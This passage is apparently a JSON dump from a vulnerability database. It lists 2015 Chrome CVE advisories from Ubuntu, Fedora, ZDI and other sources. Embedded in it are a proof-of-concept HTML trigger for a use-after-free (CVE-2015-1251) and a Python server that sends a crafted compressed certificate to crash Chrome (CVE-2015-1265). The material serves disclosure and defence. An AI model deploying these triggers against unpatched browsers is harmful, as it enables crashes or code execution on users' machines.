"CVE-2015-1255", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1255", "href": "https://ubuntu.com/security/CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:59:59", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does\nnot properly handle wraps, which allows remote attackers to bypass a\nsandbox protection mechanism or cause a denial of service (out-of-bounds\nwrite) via vectors that trigger a write operation with a large amount of\ndata, related to the PartialCircularBuffer::Write and\nPartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1252", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1252", "href": "https://ubuntu.com/security/CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T14:58:52", "description": "The Spellcheck API implementation in Google Chrome before 44.0.2403.89 does\nnot use an HTTPS session for downloading a Hunspell dictionary, which\nallows man-in-the-middle attackers to deliver incorrect spelling\nsuggestions or possibly have unspecified other impact via a crafted file, a\nrelated issue to CVE-2015-1263.\n\n#### Bugs\n\n * <https://code.google.com/p/chromium/issues/detail?id=479162>\n", "cvss3": {}, "published": "2015-07-23T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1288", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263", "CVE-2015-1288"], "modified": "2015-07-23T00:00:00", "id": "UB:CVE-2015-1288", "href": "https://ubuntu.com/security/CVE-2015-1288", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:48:57", "description": "A use-after-free vulnerability exists in Google Chrome, blink component. The vulnerability is due to error when building a shadow tree for a element with a direct reference to a disallowed element. A remote attacker could exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation could result in code execution in the context of the currently logged in user.", "cvss3": {}, "published": "2015-07-15T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome blink buildShadowAndInstanceTree Use After Free (CVE-2015-1256)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2015-07-16T00:00:00", "id": "CPAI-2015-0850", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "libvpx provides the VP8 SDK, which allows you to integrate your applications with the VP8 video codec, a high quality, royalty free, open source codec deployed on millions of computers and devices worldwide. ", "cvss3": {}, "published": "2015-09-20T15:26:23", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: libvpx-1.4.0-5.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-09-20T15:26:23", "id": "FEDORA:8A9B7608B7FE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LL2IVVSQUWYX6JPENN6XFFF2342Y2MDI/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "libvpx provides the VP8 SDK, which allows you to integrate your applications with the VP8 video codec, a high quality, royalty free, open source codec deployed on millions of computers and devices worldwide. ", "cvss3": {}, "published": "2015-10-05T22:55:46", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: libvpx-1.3.0-7.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-10-05T22:55:46", "id": "FEDORA:4F29E60478E0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KUZQFA4MIHA4LGVPNQFQ7VQHMHMZBR5U/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "libvpx provides the VP8 SDK, which allows you to integrate your applications with the VP8 video codec, a high quality, royalty free, open source codec deployed on millions of computers and devices worldwide. ", "cvss3": {}, "published": "2015-09-24T08:32:37", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: libvpx-1.3.0-7.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-09-24T08:32:37", "id": "FEDORA:C19BF612F03E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NSXAG5CUJD7D24FU55SGH57244FWP72H/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-19T03:13:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\r The specific flaw exists within SpeechRecognitionClient. By manipulating a document's elements, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.\n\nThis is private exploit. You can buy it at https://0day.today", "cvss3": {}, "published": "2015-05-24T00:00:00", "type": "zdt", "title": "Google Chrome SpeechRecognitionClient Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-24T00:00:00", "id": "1337DAY-ID-23663", "href": "https://0day.today/exploit/description/23663", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T21:03:26", "description": "A specially crafted web-page can cause the blink rendering engine used by Google Chrome and Chromium to continue to use a speech recognition API object after the memory block that contained the object has been freed. An attacker can force the code to read a pointer from the freed memory and use this to call a function, allowing arbitrary code execution. Google Chrome version 39.0 is affected.", "cvss3": {}, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Chrome Blink SpeechRecognitionController Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1251"], "modified": "2016-11-24T00:00:00", "id": "1337DAY-ID-26408", "href": "https://0day.today/exploit/description/26408", "sourceData": "Chrome blink SpeechRecognitionController use-after-free\r\n=======================================================\r\n(Chromium 455857, CVE-2015-1251)\r\n\r\nSynopsis\r\n--------\r\nA specially crafted web-page can cause the blink rendering engine used\r\nby Google Chrome and Chromium to continue to use a speech recognition\r\nAPI object after the memory block that contained the object has been\r\nfreed. An attacker can force the code to read a pointer from the freed\r\nmemory and use this to call a function, allowing arbitrary code execution.\r\n\r\nKnown affected software and attack vectors\r\n------------------------------------------\r\n+ Google Chrome 39.0\r\n\r\n An attacker would need to get a target user to open a specially\r\n crafted webpage. Disabling Javascript should prevent an attacker from\r\n triggering the vulnerable code path.\r\n\r\nDescription\r\n-----------\r\nCreating a `webkitSpeechRecognition` Javascript object in a popup window\r\nbefore closing the popup frees a C++ object used internally by the\r\nspeech recognition API code but leaves a dangling pointer to the freed\r\nmemory in another C++ object. When the `start()` Javascript method is\r\ncalled, this dangling pointer is used to try to read a function pointer\r\nfrom a virtual function table and call that function. An attacker has\r\nample time to groom the heap between the free and re-use in order to\r\ncontrol the function pointer used by the code, allowing arbitrary code\r\nexecution.\r\n\r\nExploit\r\n-------\r\nAn attacker looking to exploit this issue is going to want to try and\r\ncontrol the contents of the freed memory, before getting the code to use\r\nthe dangling pointer to call a virtual function. Doing so would allow an\r\nattacker to execute arbitrary code. This is made possible because steps\r\n5 and 6 can both be triggered at a time of the attackers choosing,\r\ngiving the attacker the ability to free the memory in step 5 whenever\r\nthis is convenient and attempt to reallocate and fill it with any data\r\nbefore executing step 6. This should allow an attacker to create a fake\r\n`vftable` pointer and gain arbitrary code execution. In order to develop\r\na working exploit, existing mitigations will need to be bypassed, most\r\nsignificantly ASLR and DEP. As this vulnerability by itself does not\r\nappear to allow bypassing these mitigations, I did not develop a working\r\nexploit for it.\r\n\r\nTime-line\r\n---------\r\n* November 2014: This vulnerability was found through fuzzing.\r\n* December 2014: This vulnerability was submitted to ZDI and iDefense.\r\n* January 2015: This vulnerability was acquired by ZDI.\r\n* February 2015: This vulnerability was fixed in revision 190993.\r\n* May 2015: This vulnerability was addressed by Google in\r\n Chrome 43.0.2357.65.\r\n* November 2016: Details of this issue are released.\r\n\r\nCheers,\r\n\r\nSkyLined\r\n\r\n\r\nRepro.html\r\n\r\n<html>\r\n <head>\r\n <script>\r\n oAWindow = window.open();\r\n oAWebkitASpeechARecognition = new oAWindow.webkitASpeechARecognition();\r\n oAWindow.close();\r\n setAInterval(function(){\r\n if (oAWindow.closed) {\r\n oAWebkitASpeechARecognition.start();\r\n }\r\n }, 10);\r\n </script>\r\n </head>\r\n</html>\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26408", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-05T23:35:18", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2015-08-15T00:00:00", "type": "zdt", "title": "Google Chrome 43.0 - Certificate MIME Handling Integer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1265"], "modified": "2015-08-15T00:00:00", "id": "1337DAY-ID-24047", "href": "https://0day.today/exploit/description/24047", "sourceData": "#! /usr/bin/python2\r\n \r\nimport socket\r\nimport sys\r\nimport time\r\n \r\nkHost = '127.0.0.1'\r\nkPort = 443\r\n \r\ndef bind_listen():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)\r\n s.bind((kHost, kPort))\r\n s.listen(1)\r\n return s\r\n \r\ndef send_certificate(c, r):\r\n print '[*] sending certificate'\r\n payload = ''\r\n with open('compressed', 'rb') as tmp:\r\n payload = tmp.read()\r\n c.send('HTTP/1.1 200 OK\\r\\n')\r\n c.send('Content-Type: application/x-x509-user-cert\\r\\n')\r\n c.send('Content-Encoding: gzip\\r\\n')\r\n c.send('Content-Length: {}\\r\\n'.format(len(payload)))\r\n c.send('\\r\\n')\r\n c.send(payload)\r\n \r\ndef main():\r\n print '[*] listening for connection on port {}:{}'.format(kHost, kPort)\r\n s = bind_listen()\r\n while True:\r\n c, (host, port) = s.accept()\r\n print '[*] connection from {}:{}'.format(host, port)\r\n while True:\r\n r = c.recv(1024)\r\n if 'favicon' in r:\r\n c.send('HTTP/1.1 404 Not Found\\r\\n\\r\\n')\r\n else:\r\n send_certificate(c, r)\r\n time.sleep(20)\r\n sys.exit(0)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n \r\nThanks,\r\nPaulos Yibelo\n\n# 0day.today [2018-03-05] #", "sourceHref": "https://0day.today/exploit/24047", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:26", "description": "", "cvss3": {}, "published": "2016-11-23T00:00:00", "type": "packetstorm", "title": "Chrome Blink SpeechRecognitionController Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1251"], "modified": "2016-11-23T00:00:00", "id": "PACKETSTORM:139874", "href": "https://packetstormsecurity.com/files/139874/Chrome-Blink-SpeechRecognitionController-Use-After-Free.html", "sourceData": "`Throughout November, I plan to release details on vulnerabilities I \nfound in web-browsers which I've not released before. This is the \nseventeenth entry in that series. Unfortunately I won't be able to \npublish everything within one month at the current rate, so I may \ncontinue to publish these through December and January. \n \nThe below information is available in more detail on my blog at \nhttp://blog.skylined.nl/20161123001.html. There you can find a repro \nthat triggered this issue, snippets from the vulnerable source and more \ndetails in addition to the information below. \n \nFollow me on http://twitter.com/berendjanwever for daily browser bugs. \n \nChrome blink SpeechRecognitionController use-after-free \n======================================================= \n(Chromium 455857, CVE-2015-1251) \n \nSynopsis \n-------- \nA specially crafted web-page can cause the blink rendering engine used \nby Google Chrome and Chromium to continue to use a speech recognition \nAPI object after the memory block that contained the object has been \nfreed. An attacker can force the code to read a pointer from the freed \nmemory and use this to call a function, allowing arbitrary code execution. \n \nKnown affected software and attack vectors \n------------------------------------------ \n+ Google Chrome 39.0 \n \nAn attacker would need to get a target user to open a specially \ncrafted webpage. Disabling Javascript should prevent an attacker from \ntriggering the vulnerable code path. \n \nDescription \n----------- \nCreating a `webkitSpeechRecognition` Javascript object in a popup window \nbefore closing the popup frees a C++ object used internally by the \nspeech recognition API code but leaves a dangling pointer to the freed \nmemory in another C++ object. When the `start()` Javascript method is \ncalled, this dangling pointer is used to try to read a function pointer \nfrom a virtual function table and call that function. An attacker has \nample time to groom the heap between the free and re-use in order to \ncontrol the function pointer used by the code, allowing arbitrary code \nexecution. \n \nExploit \n------- \nAn attacker looking to exploit this issue is going to want to try and \ncontrol the contents of the freed memory, before getting the code to use \nthe dangling pointer to call a virtual function. Doing so would allow an \nattacker to execute arbitrary code. This is made possible because steps \n5 and 6 can both be triggered at a time of the attackers choosing, \ngiving the attacker the ability to free the memory in step 5 whenever \nthis is convenient and attempt to reallocate and fill it with any data \nbefore executing step 6. This should allow an attacker to create a fake \n`vftable` pointer and gain arbitrary code execution. In order to develop \na working exploit, existing mitigations will need to be bypassed, most \nsignificantly ASLR and DEP. As this vulnerability by itself does not \nappear to allow bypassing these mitigations, I did not develop a working \nexploit for it. \n \nTime-line \n--------- \n* November 2014: This vulnerability was found through fuzzing. \n* December 2014: This vulnerability was submitted to ZDI and iDefense. \n* January 2015: This vulnerability was acquired by ZDI. \n* February 2015: This vulnerability was fixed in revision 190993. \n* May 2015: This vulnerability was addressed by Google in \nChrome 43.0.2357.65. \n* November 2016: Details of this issue are released. \n \nCheers, \n \nSkyLined \n \n \nRepro.html \n \n<html> \n<head> \n<script> \noAWindow = window.open(); \noAWebkitASpeechARecognition = new oAWindow.webkitASpeechARecognition(); \noAWindow.close(); \nsetAInterval(function(){ \nif (oAWindow.closed) { \noAWebkitASpeechARecognition.start(); \n} \n}, 10); \n</script> \n</head> \n</html> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139874/chromeblink-uaf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2023-12-03T17:17:38", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within SpeechRecognitionClient. By manipulating a document's elements, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "zdi", "title": "Google Chrome SpeechRecognitionClient Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-19T00:00:00", "id": "ZDI-15-236", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-236/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
Debian Security Advisory DSA 3267-1 (chromium-browser - security update)
